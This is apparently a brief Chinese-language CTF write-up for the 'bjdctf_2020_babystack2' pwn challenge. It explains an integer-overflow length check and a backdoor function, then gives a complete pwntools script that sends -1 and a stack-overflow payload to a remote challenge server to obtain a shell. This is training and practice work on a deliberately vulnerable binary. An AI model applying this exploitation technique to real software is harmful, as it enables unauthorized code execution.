这道题轻松,最近遇到最简单的题目了
    image.png
    64位小端序程序
    image.png
    逻辑很简单输入一个数字就是下个字符串的长度,这里nbytes定义两边不一样
    噢,这里说一下size_t是32位下是4个字节的无符号整数类型 64位下是8个字节的无符号整数类型
    整数溢出漏洞
    image.png
    还有后门函数
    贴代码贴代码

    1. from LibcSearcher import LibcSearcher
    2. from pwn import *
    4. context.log_level = 'debug'
    6. #io = process("./bjdctf_2020_babystack2")
    7. io = remote("node4.buuoj.cn",29999)
    8. elf = ELF("./bjdctf_2020_babystack2")
    9. system_addr = 0x000000000040072A
    11. offest = 0x10 
    12. io.recvuntil('[+]Please input the length of your name:')
    13. io.sendline('-1')
    14. io.recvuntil("[+]What's u name?")
    15. payload = b'a'*(offest+0x8)+p64(system_addr)
    16. io.sendline(payload)
    17. io.interactive()

    舒服了,,,,